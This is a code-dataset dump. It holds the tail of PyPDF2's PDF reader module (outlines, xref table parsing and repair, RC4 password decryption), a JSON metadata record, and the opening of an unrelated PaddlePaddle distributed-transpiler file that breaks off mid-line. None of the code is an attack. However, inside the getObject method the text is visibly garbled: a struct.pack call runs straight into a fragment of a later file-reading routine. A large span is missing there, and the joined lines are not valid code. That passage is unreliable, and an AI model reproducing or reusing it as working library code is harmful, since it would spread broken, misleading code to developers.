catalog[CA.NAMES]\n if CA.DESTS in names:\n tree = names[CA.DESTS]\n\n if tree is None:\n return retval\n\n if PA.KIDS in tree:\n # recurse down the tree\n for kid in tree[PA.KIDS]:\n self.getNamedDestinations(kid.getObject(), retval)\n\n if CA.NAMES in tree:\n names = tree[CA.NAMES]\n for i in range(0, len(names), 2):\n key = names[i].getObject()\n val = names[i + 1].getObject()\n if isinstance(val, DictionaryObject) and \"/D\" in val:\n val = val[\"/D\"]\n dest = self._buildDestination(key, val)\n if dest is not None:\n retval[key] = dest\n\n return retval\n\n @property\n def outlines(self):\n \"\"\"\n Read-only property that accesses the\n :meth:`getOutlines()` function.\n \"\"\"\n return self.getOutlines()\n\n def getOutlines(self, node=None, outlines=None):\n \"\"\"\n Retrieve the document outline present in the document.\n\n :return: a nested list of :class:`Destinations`.\n \"\"\"\n if outlines is None:\n outlines = []\n catalog = self.trailer[TK.ROOT]\n\n # get the outline dictionary and named destinations\n if CO.OUTLINES in catalog:\n try:\n lines = catalog[CO.OUTLINES]\n except PdfReadError:\n # this occurs if the /Outlines object reference is incorrect\n # for an example of such a file, see https://unglueit-files.s3.amazonaws.com/ebf/7552c42e9280b4476e59e77acc0bc812.pdf\n # so continue to load the file without the Bookmarks\n return outlines\n\n if \"/First\" in lines:\n node = lines[\"/First\"]\n self._namedDests = self.getNamedDestinations()\n\n if node is None:\n return outlines\n\n # see if there are any more outlines\n while True:\n outline = self._buildOutline(node)\n if outline:\n outlines.append(outline)\n\n # check for sub-outlines\n if \"/First\" in node:\n sub_outlines = []\n self.getOutlines(node[\"/First\"], sub_outlines)\n if sub_outlines:\n outlines.append(sub_outlines)\n\n if \"/Next\" not in node:\n break\n node = node[\"/Next\"]\n\n return outlines\n\n def _getPageNumberByIndirect(self, indirectRef):\n \"\"\"Generate _pageId2Num\"\"\"\n if self._pageId2Num is None:\n id2num = {}\n for i, x in enumerate(self.pages):\n id2num[x.indirectRef.idnum] = i\n self._pageId2Num = id2num\n\n if isinstance(indirectRef, NullObject):\n return -1\n if 
isinstance(indirectRef, int):\n idnum = indirectRef\n else:\n idnum = indirectRef.idnum\n\n ret = self._pageId2Num.get(idnum, -1)\n return ret\n\n def getPageNumber(self, page):\n \"\"\"\n Retrieve page number of a given PageObject\n\n :param PageObject page: The page to get page number. Should be\n an instance of :class:`PageObject`\n :return: the page number or -1 if page not found\n :rtype: int\n \"\"\"\n indirect_ref = page.indirectRef\n ret = self._getPageNumberByIndirect(indirect_ref)\n return ret\n\n def getDestinationPageNumber(self, destination):\n \"\"\"\n Retrieve page number of a given Destination object\n\n :param Destination destination: The destination to get page number.\n Should be an instance of\n :class:`Destination`\n :return: the page number or -1 if page not found\n :rtype: int\n \"\"\"\n indirect_ref = destination.page\n ret = self._getPageNumberByIndirect(indirect_ref)\n return ret\n\n def _buildDestination(self, title, array):\n page, typ = array[0:2]\n array = array[2:]\n try:\n return Destination(title, page, typ, *array)\n except PdfReadError:\n warnings.warn(\"Unknown destination : \" + title + \" \" + str(array))\n if self.strict:\n raise\n else:\n # create a link to first Page\n return Destination(\n title, self.getPage(0).indirectRef, TextStringObject(\"/Fit\")\n )\n\n def _buildOutline(self, node):\n dest, title, outline = None, None, None\n\n if \"/A\" in node and \"/Title\" in node:\n # Action, section 8.5 (only type GoTo supported)\n title = node[\"/Title\"]\n action = node[\"/A\"]\n if action[\"/S\"] == \"/GoTo\":\n dest = action[\"/D\"]\n elif \"/Dest\" in node and \"/Title\" in node:\n # Destination, section 8.2.1\n title = node[\"/Title\"]\n dest = node[\"/Dest\"]\n\n # if destination found, then create outline\n if dest:\n if isinstance(dest, ArrayObject):\n outline = self._buildDestination(title, dest)\n elif isString(dest) and dest in self._namedDests:\n outline = self._namedDests[dest]\n outline[NameObject(\"/Title\")] = title\n else:\n raise PdfReadError(\"Unexpected destination %r\" % dest)\n return outline\n\n @property\n def pages(self):\n \"\"\"\n Read-only property that emulates a list based upon the\n :meth:`getNumPages()` and\n :meth:`getPage()` methods.\n \"\"\"\n return ConvertFunctionsToVirtualList(self.getNumPages, self.getPage)\n\n def getPageLayout(self):\n \"\"\"\n Get the page layout.\n\n See :meth:`setPageLayout()`\n for a description of valid layouts.\n\n :return: Page layout currently being used.\n :rtype: ``str``, ``None`` if not specified\n \"\"\"\n try:\n return self.trailer[TK.ROOT][\"/PageLayout\"]\n except KeyError:\n return None\n\n @property\n def pageLayout(self):\n \"\"\"Read-only property accessing the\n :meth:`getPageLayout()` method.\"\"\"\n return self.getPageLayout()\n\n def getPageMode(self):\n \"\"\"\n Get the page mode.\n See :meth:`setPageMode()`\n for a description of valid modes.\n\n :return: Page mode currently being used.\n :rtype: ``str``, ``None`` if not specified\n \"\"\"\n try:\n return self.trailer[TK.ROOT][\"/PageMode\"]\n except KeyError:\n return None\n\n @property\n def pageMode(self):\n \"\"\"Read-only property accessing the\n :meth:`getPageMode()` method.\"\"\"\n return self.getPageMode()\n\n def _flatten(self, pages=None, inherit=None, indirectRef=None):\n inheritablePageAttributes = (\n NameObject(PG.RESOURCES),\n NameObject(PG.MEDIABOX),\n NameObject(PG.CROPBOX),\n NameObject(PG.ROTATE),\n )\n if inherit is None:\n inherit = {}\n if pages is None:\n # Fix issue 327: set flattenedPages 
attribute only for\n # decrypted file\n catalog = self.trailer[TK.ROOT].getObject()\n pages = catalog[\"/Pages\"].getObject()\n self.flattenedPages = []\n\n t = \"/Pages\"\n if PA.TYPE in pages:\n t = pages[PA.TYPE]\n\n if t == \"/Pages\":\n for attr in inheritablePageAttributes:\n if attr in pages:\n inherit[attr] = pages[attr]\n for page in pages[PA.KIDS]:\n addt = {}\n if isinstance(page, IndirectObject):\n addt[\"indirectRef\"] = page\n self._flatten(page.getObject(), inherit, **addt)\n elif t == \"/Page\":\n for attr, value in list(inherit.items()):\n # if the page has its own value, it does not inherit the\n # parent's value:\n if attr not in pages:\n pages[attr] = value\n page_obj = PageObject(self, indirectRef)\n page_obj.update(pages)\n self.flattenedPages.append(page_obj)\n\n def _getObjectFromStream(self, indirectReference):\n # indirect reference to object in object stream\n # read the entire object stream into memory\n stmnum, idx = self.xref_objStm[indirectReference.idnum]\n obj_stm = IndirectObject(stmnum, 0, self).getObject()\n # This is an xref to a stream, so its type better be a stream\n assert obj_stm[\"/Type\"] == \"/ObjStm\"\n # /N is the number of indirect objects in the stream\n assert idx < obj_stm[\"/N\"]\n stream_data = BytesIO(b_(obj_stm.getData()))\n for i in range(obj_stm[\"/N\"]):\n readNonWhitespace(stream_data)\n stream_data.seek(-1, 1)\n objnum = NumberObject.readFromStream(stream_data)\n readNonWhitespace(stream_data)\n stream_data.seek(-1, 1)\n offset = NumberObject.readFromStream(stream_data)\n readNonWhitespace(stream_data)\n stream_data.seek(-1, 1)\n if objnum != indirectReference.idnum:\n # We're only interested in one object\n continue\n if self.strict and idx != i:\n raise PdfReadError(\"Object is in wrong index.\")\n stream_data.seek(obj_stm[\"/First\"] + offset, 0)\n try:\n obj = readObject(stream_data, self)\n except PdfStreamError as e:\n # Stream object cannot be read. Normally, a critical error, but\n # Adobe Reader doesn't complain, so continue (in strict mode?)\n warnings.warn(\n \"Invalid stream (index %d) within object %d %d: %s\"\n % (i, indirectReference.idnum, indirectReference.generation, e),\n PdfReadWarning,\n )\n\n if self.strict:\n raise PdfReadError(\"Can't read object stream: %s\" % e)\n # Replace with null. 
Hopefully it's nothing important.\n obj = NullObject()\n return obj\n\n if self.strict:\n raise PdfReadError(\"This is a fatal error in strict mode.\")\n return NullObject()\n\n def getObject(self, indirectReference):\n retval = self.cacheGetIndirectObject(\n indirectReference.generation, indirectReference.idnum\n )\n if retval is not None:\n return retval\n if (\n indirectReference.generation == 0\n and indirectReference.idnum in self.xref_objStm\n ):\n retval = self._getObjectFromStream(indirectReference)\n elif (\n indirectReference.generation in self.xref\n and indirectReference.idnum in self.xref[indirectReference.generation]\n ):\n start = self.xref[indirectReference.generation][indirectReference.idnum]\n self.stream.seek(start, 0)\n idnum, generation = self.readObjectHeader(self.stream)\n if idnum != indirectReference.idnum and self.xrefIndex:\n # Xref table probably had bad indexes due to not being zero-indexed\n if self.strict:\n raise PdfReadError(\n \"Expected object ID (%d %d) does not match actual (%d %d); xref table not zero-indexed.\"\n % (\n indirectReference.idnum,\n indirectReference.generation,\n idnum,\n generation,\n )\n )\n else:\n pass # xref table is corrected in non-strict mode\n elif idnum != indirectReference.idnum and self.strict:\n # some other problem\n raise PdfReadError(\n \"Expected object ID (%d %d) does not match actual (%d %d).\"\n % (\n indirectReference.idnum,\n indirectReference.generation,\n idnum,\n generation,\n )\n )\n if self.strict:\n assert generation == indirectReference.generation\n retval = readObject(self.stream, self)\n\n # override encryption is used for the /Encrypt dictionary\n if not self._override_encryption and self.isEncrypted:\n # if we don't have the encryption key:\n if not hasattr(self, \"_decryption_key\"):\n raise PdfReadError(\"file has not been decrypted\")\n # otherwise, decrypt here...\n pack1 = struct.pack(\" size1M else absoluteEndFilePos\n stream.seek(-datablock, 2)\n tmp = stream.read(datablock)\n xref_loc = tmp.find(b_(\"xref\"))\n if xref_loc != -1:\n startxref = absoluteEndFilePos - datablock + xref_loc\n\n # check and eventually correct the startxref only in not strict\n xref_issue_nr = self._get_xref_issues(stream, startxref)\n if self.strict and xref_issue_nr:\n raise PdfReadError(\"Broken xref table\")\n elif xref_issue_nr != 0:\n warnings.warn(\n \"incorrect startxref pointer({})\".format(xref_issue_nr), PdfReadWarning\n )\n\n # read all cross reference tables and their trailers\n self.xref = {}\n self.xref_objStm = {}\n self.trailer = DictionaryObject()\n while True:\n # load the xref table\n stream.seek(startxref, 0)\n x = stream.read(1)\n if x == b_(\"x\"):\n self._read_standard_xref_table(stream)\n readNonWhitespace(stream)\n stream.seek(-1, 1)\n new_trailer = readObject(stream, self)\n for key, value in list(new_trailer.items()):\n if key not in self.trailer:\n self.trailer[key] = value\n if \"/Prev\" in new_trailer:\n startxref = new_trailer[\"/Prev\"]\n else:\n break\n elif xref_issue_nr:\n try:\n self._rebuild_xref_table(stream)\n break\n except Exception:\n xref_issue_nr = 0\n elif x.isdigit():\n xrefstream = self._read_pdf15_xref_stream(stream)\n\n trailer_keys = TK.ROOT, TK.ENCRYPT, TK.INFO, TK.ID\n for key in trailer_keys:\n if key in xrefstream and key not in self.trailer:\n self.trailer[NameObject(key)] = xrefstream.raw_get(key)\n if \"/Prev\" in xrefstream:\n startxref = xrefstream[\"/Prev\"]\n else:\n break\n else:\n # some PDFs have /Prev=0 in the trailer, instead of no /Prev\n if startxref == 
0:\n if self.strict:\n raise PdfReadError(\n \"/Prev=0 in the trailer (try opening with strict=False)\"\n )\n else:\n warnings.warn(\n \"/Prev=0 in the trailer - assuming there\"\n \" is no previous xref table\"\n )\n break\n # bad xref character at startxref. Let's see if we can find\n # the xref table nearby, as we've observed this error with an\n # off-by-one before.\n stream.seek(-11, 1)\n tmp = stream.read(20)\n xref_loc = tmp.find(b_(\"xref\"))\n if xref_loc != -1:\n startxref -= 10 - xref_loc\n continue\n # No explicit xref table, try finding a cross-reference stream.\n stream.seek(startxref, 0)\n found = False\n for look in range(5):\n if stream.read(1).isdigit():\n # This is not a standard PDF, consider adding a warning\n startxref += look\n found = True\n break\n if found:\n continue\n # no xref table found at specified location\n raise PdfReadError(\"Could not find xref table at specified location\")\n\n if not self.xref:\n raise PdfReadError(\"Could not find xref table - broken file\")\n # if not zero-indexed, verify that the table is correct; change it if necessary\n if self.xrefIndex and not self.strict:\n loc = stream.tell()\n for gen in self.xref:\n if gen == 65535:\n continue\n for id in self.xref[gen]:\n stream.seek(self.xref[gen][id], 0)\n try:\n pid, pgen = self.readObjectHeader(stream)\n except ValueError:\n break\n if pid == id - self.xrefIndex:\n self._zeroXref(gen)\n break\n # if not, then either it's just plain wrong, or the\n # non-zero-index is actually correct\n stream.seek(loc, 0) # return to where it was\n\n def _find_startxref_pos(self, stream):\n \"\"\"Find startxref entry - the location of the xref table\"\"\"\n line = self.readNextEndLine(stream)\n try:\n startxref = int(line)\n except ValueError:\n # 'startxref' may be on the same line as the location\n if not line.startswith(b_(\"startxref\")):\n raise PdfReadError(\"startxref not found\")\n startxref = int(line[9:].strip())\n warnings.warn(\"startxref on same line as offset\")\n else:\n line = self.readNextEndLine(stream)\n if line[:9] != b_(\"startxref\"):\n raise PdfReadError(\"startxref not found\")\n return startxref\n\n def _read_standard_xref_table(self, stream):\n # standard cross-reference table\n ref = stream.read(4)\n if ref[:3] != b_(\"ref\"):\n raise PdfReadError(\"xref table read error\")\n readNonWhitespace(stream)\n stream.seek(-1, 1)\n firsttime = True # check if the first time looking at the xref table\n while True:\n num = readObject(stream, self)\n if firsttime and num != 0:\n self.xrefIndex = num\n if self.strict:\n warnings.warn(\n \"Xref table not zero-indexed. ID numbers for objects will be corrected.\",\n PdfReadWarning,\n )\n # if table not zero indexed, could be due to error from when PDF was created\n # which will lead to mismatched indices later on, only warned and corrected if self.strict=True\n firsttime = False\n readNonWhitespace(stream)\n stream.seek(-1, 1)\n size = readObject(stream, self)\n readNonWhitespace(stream)\n stream.seek(-1, 1)\n cnt = 0\n while cnt < size:\n line = stream.read(20)\n\n # It's very clear in section 3.4.3 of the PDF spec\n # that all cross-reference table lines are a fixed\n # 20 bytes (as of PDF 1.7). However, some files have\n # 21-byte entries (or more) due to the use of \\r\\n\n # (CRLF) EOL's. 
Detect that case, and adjust the line\n # until it does not begin with a \\r (CR) or \\n (LF).\n while line[0] in b_(\"\\x0D\\x0A\"):\n stream.seek(-20 + 1, 1)\n line = stream.read(20)\n\n # On the other hand, some malformed PDF files\n # use a single character EOL without a preceding\n # space. Detect that case, and seek the stream\n # back one character. (0-9 means we've bled into\n # the next xref entry, t means we've bled into the\n # text \"trailer\"):\n if line[-1] in b_(\"0123456789t\"):\n stream.seek(-1, 1)\n\n offset, generation = line[:16].split(b_(\" \"))\n offset, generation = int(offset), int(generation)\n if generation not in self.xref:\n self.xref[generation] = {}\n if num in self.xref[generation]:\n # It really seems like we should allow the last\n # xref table in the file to override previous\n # ones. Since we read the file backwards, assume\n # any existing key is already set correctly.\n pass\n else:\n self.xref[generation][num] = offset\n cnt += 1\n num += 1\n readNonWhitespace(stream)\n stream.seek(-1, 1)\n trailertag = stream.read(7)\n if trailertag != b_(\"trailer\"):\n # more xrefs!\n stream.seek(-7, 1)\n else:\n break\n\n def _read_pdf15_xref_stream(self, stream):\n # PDF 1.5+ Cross-Reference Stream\n stream.seek(-1, 1)\n idnum, generation = self.readObjectHeader(stream)\n xrefstream = readObject(stream, self)\n assert xrefstream[\"/Type\"] == \"/XRef\"\n self.cacheIndirectObject(generation, idnum, xrefstream)\n stream_data = BytesIO(b_(xrefstream.getData()))\n # Index pairs specify the subsections in the dictionary. If\n # none create one subsection that spans everything.\n idx_pairs = xrefstream.get(\"/Index\", [0, xrefstream.get(\"/Size\")])\n entry_sizes = xrefstream.get(\"/W\")\n assert len(entry_sizes) >= 3\n if self.strict and len(entry_sizes) > 3:\n raise PdfReadError(\"Too many entry sizes: %s\" % entry_sizes)\n\n def get_entry(i):\n # Reads the correct number of bytes for each entry. See the\n # discussion of the W parameter in PDF spec table 17.\n if entry_sizes[i] > 0:\n d = stream_data.read(entry_sizes[i])\n return convertToInt(d, entry_sizes[i])\n\n # PDF Spec Table 17: A value of zero for an element in the\n # W array indicates...the default value shall be used\n if i == 0:\n return 1 # First value defaults to 1\n else:\n return 0\n\n def used_before(num, generation):\n # We move backwards through the xrefs, don't replace any.\n return num in self.xref.get(generation, []) or num in self.xref_objStm\n\n # Iterate through each subsection\n self._read_xref_subsections(idx_pairs, get_entry, used_before)\n return xrefstream\n\n @staticmethod\n def _size_to_search_xref():\n # 1MB\n return 1024 * 1024\n\n @staticmethod\n def _get_xref_issues(stream, startxref):\n \"\"\"Return an int which indicates an issue. 
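The nonzero codes map to the specific startxref defects checked below. 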
0 means there is no issue.\"\"\"\n if startxref == 0:\n return 0\n stream.seek(startxref - 1, 0) # -1 to check character before\n line = stream.read(1)\n if line not in b_(\"\\r\\n \\t\"):\n return 1\n line = stream.read(4)\n if line != b_(\"xref\"):\n # not an xref so check if it is an XREF object\n line = b_(\"\")\n while line in b_(\"0123456789 \\t\"):\n line = stream.read(1)\n if line == b_(\"\"):\n return 2\n line += stream.read(2) # 1 char already read, +2 to check \"obj\"\n if line.lower() != b_(\"obj\"):\n return 3\n # while stream.read(1) in b_(\" \\t\\r\\n\"):\n # pass\n # line = stream.read(256) # check that it is xref obj\n # if b_(\"/xref\") not in line.lower():\n # return 4\n return 0\n\n def _rebuild_xref_table(self, stream):\n self.xref = {}\n stream.seek(0, 0)\n f_ = stream.read(-1)\n import re\n\n for m in re.finditer(b_(r\"[\\r\\n \\t][ \\t]*(\\d+)[ \\t]+(\\d+)[ \\t]+obj\"), f_):\n idnum = int(m.group(1))\n generation = int(m.group(2))\n if generation not in self.xref:\n self.xref[generation] = {}\n self.xref[generation][idnum] = m.start(1)\n trailer_pos = f_.rfind(b\"trailer\") - len(f_) + 7\n stream.seek(trailer_pos, 2)\n # code below duplicated\n readNonWhitespace(stream)\n stream.seek(-1, 1)\n\n # there might be something that is not a dict (see #856)\n new_trailer = readObject(stream, self)\n\n for key, value in list(new_trailer.items()):\n if key not in self.trailer:\n self.trailer[key] = value\n\n def _read_xref_subsections(self, idx_pairs, getEntry, used_before):\n last_end = 0\n for start, size in self._pairs(idx_pairs):\n # The subsections must increase\n assert start >= last_end\n last_end = start + size\n for num in range(start, start + size):\n # The first entry is the type\n xref_type = getEntry(0)\n # The rest of the elements depend on the xref_type\n if xref_type == 0:\n # linked list of free objects\n next_free_object = getEntry(1) # noqa: F841\n next_generation = getEntry(2) # noqa: F841\n elif xref_type == 1:\n # objects that are in use but are not compressed\n byte_offset = getEntry(1)\n generation = getEntry(2)\n if generation not in self.xref:\n self.xref[generation] = {}\n if not used_before(num, generation):\n self.xref[generation][num] = byte_offset\n elif xref_type == 2:\n # compressed objects\n objstr_num = getEntry(1)\n obstr_idx = getEntry(2)\n generation = 0 # PDF spec table 18, generation is 0\n if not used_before(num, generation):\n self.xref_objStm[num] = (objstr_num, obstr_idx)\n elif self.strict:\n raise PdfReadError(\"Unknown xref type: %s\" % xref_type)\n\n def _zeroXref(self, generation):\n self.xref[generation] = {\n k - self.xrefIndex: v for (k, v) in list(self.xref[generation].items())\n }\n\n def _pairs(self, array):\n i = 0\n while True:\n yield array[i], array[i + 1]\n i += 2\n if (i + 1) >= len(array):\n break\n\n def readNextEndLine(self, stream, limit_offset=0):\n line_parts = []\n while True:\n # Prevent infinite loops in malformed PDFs\n if stream.tell() == 0 or stream.tell() == limit_offset:\n raise PdfReadError(\"Could not read malformed PDF file\")\n x = stream.read(1)\n if stream.tell() < 2:\n raise PdfReadError(\"EOL marker not found\")\n stream.seek(-2, 1)\n if x == b_(\"\\n\") or x == b_(\"\\r\"): ## \\n = LF; \\r = CR\n crlf = False\n while x == b_(\"\\n\") or x == b_(\"\\r\"):\n x = stream.read(1)\n if x == b_(\"\\n\") or x == b_(\"\\r\"): # account for CR+LF\n stream.seek(-1, 1)\n crlf = True\n if stream.tell() < 2:\n raise PdfReadError(\"EOL marker not found\")\n stream.seek(-2, 1)\n stream.seek(\n 2 if crlf 
else 1, 1\n ) # if using CR+LF, go back 2 bytes, else 1\n break\n else:\n line_parts.append(x)\n line_parts.reverse()\n return b\"\".join(line_parts)\n\n def decrypt(self, password):\n \"\"\"\n When using an encrypted / secured PDF file with the PDF Standard\n encryption handler, this function will allow the file to be decrypted.\n It checks the given password against the document's user password and\n owner password, and then stores the resulting decryption key if either\n password is correct.\n\n It does not matter which password was matched. Both passwords provide\n the correct decryption key that will allow the document to be used with\n this library.\n\n :param str password: The password to match.\n :return: ``0`` if the password failed, ``1`` if the password matched the user\n password, and ``2`` if the password matched the owner password.\n :rtype: int\n :raises NotImplementedError: if document uses an unsupported encryption\n method.\n \"\"\"\n\n self._override_encryption = True\n try:\n return self._decrypt(password)\n finally:\n self._override_encryption = False\n\n def decode_permissions(self, permissions_code):\n # Takes the permissions as an integer, returns the allowed access\n permissions = {}\n permissions[\"print\"] = permissions_code & (1 << 3 - 1) != 0 # bit 3\n permissions[\"modify\"] = permissions_code & (1 << 4 - 1) != 0 # bit 4\n permissions[\"copy\"] = permissions_code & (1 << 5 - 1) != 0 # bit 5\n permissions[\"annotations\"] = permissions_code & (1 << 6 - 1) != 0 # bit 6\n permissions[\"forms\"] = permissions_code & (1 << 9 - 1) != 0 # bit 9\n permissions[\"accessability\"] = permissions_code & (1 << 10 - 1) != 0 # bit 10\n permissions[\"assemble\"] = permissions_code & (1 << 11 - 1) != 0 # bit 11\n permissions[\"print_high_quality\"] = (\n permissions_code & (1 << 12 - 1) != 0\n ) # bit 12\n return permissions\n\n def _decrypt(self, password):\n # Decrypts data as per Section 3.5 (page 117) of PDF spec v1.7\n # \"The security handler defines the use of encryption and decryption in\n # the document, using the rules specified by the CF, StmF, and StrF entries\"\n encrypt = self.trailer[TK.ENCRYPT].getObject()\n # /Encrypt Keys:\n # Filter (name) : \"name of the preferred security handler \"\n # V (number) : Algorithm Code\n # Length (integer): Length of encryption key, in bits\n # CF (dictionary) : Crypt filter\n # StmF (name) : Name of the crypt filter that is used by default when decrypting streams\n # StrF (name) : The name of the crypt filter that is used when decrypting all strings in the document\n # R (number) : Standard security handler revision number\n # U (string) : A 32-byte string, based on the user password\n # P (integer) : Permissions allowed with user access\n if encrypt[\"/Filter\"] != \"/Standard\":\n raise NotImplementedError(\n \"only Standard PDF encryption handler is available\"\n )\n if not (encrypt[\"/V\"] in (1, 2)):\n raise NotImplementedError(\n \"only algorithm code 1 and 2 are supported. 
This PDF uses code %s\"\n % encrypt[\"/V\"]\n )\n user_password, key = self._authenticateUserPassword(password)\n if user_password:\n self._decryption_key = key\n return 1\n else:\n rev = encrypt[\"/R\"].getObject()\n if rev == 2:\n keylen = 5\n else:\n keylen = encrypt[SA.LENGTH].getObject() // 8\n key = _alg33_1(password, rev, keylen)\n real_O = encrypt[\"/O\"].getObject()\n if rev == 2:\n userpass = utils.RC4_encrypt(key, real_O)\n else:\n val = real_O\n for i in range(19, -1, -1):\n new_key = b_(\"\")\n for l in range(len(key)):\n new_key += b_(chr(utils.ord_(key[l]) ^ i))\n val = utils.RC4_encrypt(new_key, val)\n userpass = val\n owner_password, key = self._authenticateUserPassword(userpass)\n if owner_password:\n self._decryption_key = key\n return 2\n return 0\n\n def _authenticateUserPassword(self, password):\n encrypt = self.trailer[TK.ENCRYPT].getObject()\n rev = encrypt[ED.R].getObject()\n owner_entry = encrypt[ED.O].getObject()\n p_entry = encrypt[ED.P].getObject()\n if TK.ID in self.trailer:\n id_entry = self.trailer[TK.ID].getObject()\n else:\n # Some documents may not have a /ID, use two empty\n # byte strings instead. Solves\n # https://github.com/mstamy2/PyPDF2/issues/608\n id_entry = ArrayObject([ByteStringObject(b\"\"), ByteStringObject(b\"\")])\n id1_entry = id_entry[0].getObject()\n real_U = encrypt[ED.U].getObject().original_bytes\n if rev == 2:\n U, key = _alg34(password, owner_entry, p_entry, id1_entry)\n elif rev >= 3:\n U, key = _alg35(\n password,\n rev,\n encrypt[SA.LENGTH].getObject() // 8,\n owner_entry,\n p_entry,\n id1_entry,\n encrypt.get(ED.ENCRYPT_METADATA, BooleanObject(False)).getObject(),\n )\n U, real_U = U[:16], real_U[:16]\n return U == real_U, key\n\n def getIsEncrypted(self):\n return TK.ENCRYPT in self.trailer\n\n @property\n def isEncrypted(self):\n \"\"\"\n Read-only boolean property showing whether this PDF file is encrypted.\n Note that this property, if true, will remain true even after the\n :meth:`decrypt()` method is called.\n \"\"\"\n return self.getIsEncrypted()\n","sub_path":"PyPDF2/_reader.py","file_name":"_reader.py","file_ext":"py","file_size_in_byte":56350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"79379892","text":"# Copyright (c) 2018 PaddlePaddle Authors. 
All Rights Reserve.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport framework\nfrom framework import Program, default_main_program, Parameter, Variable\nimport optimizer\nfrom layer_helper import LayerHelper\n\n\ndef hash_name_to_server(params_grads, pserver_endpoints):\n \"\"\"\n :param param_grads:\n :return: a map of pserver endpoint -> \n params -> [param list]\n grads -> [grad list]\n \"\"\"\n\n def _hash_param(param_name, total):\n return hash(param_name) % total\n\n param_grad_map = dict()\n for param, grad in params_grads:\n if param.trainable is True and grad is not None:\n server_id = _hash_param(param.name, len(pserver_endpoints))\n server_for_param = pserver_endpoints[server_id]\n if not param_grad_map.has_key(server_for_param):\n param_grad_map[server_for_param] = {\"params\": [], \"grads\": []}\n param_grad_map[server_for_param][\"params\"].append(param)\n param_grad_map[server_for_param][\"grads\"].append(grad)\n\n return param_grad_map\n\n\ndef round_robin(params_grads, pserver_endpoints):\n assert (len(params_grads) > len(pserver_endpoints))\n\n param_grad_map = dict()\n pserver_idx = 0\n for param, grad in params_grads:\n if param.trainable is True:\n server_for_param = pserver_endpoints[pserver_idx]\n if not param_grad_map.has_key(server_for_param):\n param_grad_map[server_for_param] = {\"params\": [], \"grads\": []}\n\n param_grad_map[server_for_param][\"params\"].append(param)\n param_grad_map[server_for_param][\"grads\"].append(grad)\n\n pserver_idx += 1\n if pserver_idx >= len(pserver_endpoints):\n pserver_idx = 0\n return param_grad_map\n\n\nclass SimpleDistributeTranspiler:\n def transpile(self,\n optimize_ops,\n params_grads,\n program=None,\n pservers=\"127.0.0.1:6174\",\n trainers=1,\n split_method=round_robin):\n \"\"\"\n Transpile the program to a distributed data-parallelism programs.\n\n The main_program will be transform to use a remote parameter server\n to do parameter optimization. 
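        Each trainable parameter is assigned to one pserver endpoint by the given split_method (round_robin by default), and a single send op is appended to ship every gradient to the endpoint that owns its parameter.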
And the optimization graph will be put\n in to a parameter server program.\n\n Use different methods to split trainable varialbles to different\n parameter servers.\n\n Example to run:\n\n exe = fluid.Executor(place)\n t = fluid.DistributeTranspiler()\n t.transpile(optimize_ops, params_grads, pservers=\"127.0.0.1:6174\", trainers=1)\n\n pserver_endpoint = os.getenv(\"PSERVER\")\n if pserver_endpoint:\n pserver_prog = t.get_pserver_program(pserver_endpoint, optimize_ops)\n exe.run(fluid.default_startup_program())\n exe.run(pserver_prog)\n else:\n feeder = fluid.DataFeeder(feed_list=[images, label], place=place)\n exe.run(fluid.default_startup_program())\n\n for pass_id in range(PASS_NUM):\n ...\n\n :param optimize_ops: op list of optimization, should be the\n return value of Optimizer.minimize\n :type optimize_ops: list\n :param program: program to optimize, default default_main_program\n :param pservers: parameter server endpoints like \"m1:6174,m2:6174\"\n :type pservers: string\n\n :return: return a list of programs\n \"\"\"\n if program is None:\n program = default_main_program()\n self.program = program\n self.trainers = trainers\n self.optimize_ops = optimize_ops\n self._optimize_distributed(\n optimize_ops,\n program,\n params_grads,\n pservers=pservers,\n trainers=trainers,\n split_method=split_method)\n\n def _clone_param(self, block, v):\n assert isinstance(v, Parameter)\n new_p = Parameter(\n block=block,\n shape=v.shape,\n dtype=v.dtype,\n type=v.type,\n lod_level=v.lod_level,\n stop_gradient=v.stop_gradient,\n trainable=v.trainable,\n optimize_attr=v.optimize_attr,\n regularizer=v.regularizer,\n name=v.name)\n block.vars[new_p.name] = new_p\n\n def _clone_var(self, block, var):\n assert isinstance(var, Variable)\n return block.create_var(\n name=var.name,\n shape=var.shape,\n dtype=var.dtype,\n type=var.type,\n lod_level=var.lod_level,\n persistable=var.persistable)\n\n def _optimize_distributed(self, optimize_ops, program, params_and_grads,\n **kwargs):\n if kwargs.has_key(\"split_method\"):\n split_method = kwargs[\"split_method\"]\n else:\n split_method = round_robin\n\n assert (callable(split_method))\n pserver_endpoints = kwargs[\"pservers\"].split(\",\")\n self.param_grad_map = split_method(params_and_grads, pserver_endpoints)\n\n send_op_ordered_inputs = []\n send_op_ordered_outputs = []\n epmap = []\n for ep, v in self.param_grad_map.iteritems():\n send_op_ordered_inputs.extend(v[\"grads\"])\n send_op_ordered_outputs.extend(v[\"params\"])\n for i in v[\"grads\"]:\n epmap.append(ep)\n send_op = program.global_block().append_op(\n type=\"send\",\n inputs={\"X\": send_op_ordered_inputs\n }, # inputs is a list of tensors to be send\n outputs={\"Out\": send_op_ordered_outputs},\n attrs={\"endpoints\": pserver_endpoints,\n \"epmap\": epmap})\n\n def get_trainer_program(self):\n # remove optimize ops and add a send op to main_program\n self.program.global_block().delete_ops(self.optimize_ops)\n return self.program\n\n def _create_var_for_trainers(self, block, var, trainers):\n var_list = []\n for i in xrange(trainers):\n var_each = block.create_var(\n name=\"%s.trainer_%d\" % (var.name, i),\n psersistable=var.persistable,\n dtype=var.dtype,\n shape=var.shape)\n var_list.append(var_each)\n return var_list\n\n def get_pserver_program(self, endpoint, optimize_ops):\n pserver_program = Program()\n for v in self.param_grad_map[endpoint][\"params\"]:\n self._clone_param(pserver_program.global_block(), v)\n\n optimize_sub_program = Program()\n grad_var_names = [\n var.name for var in 
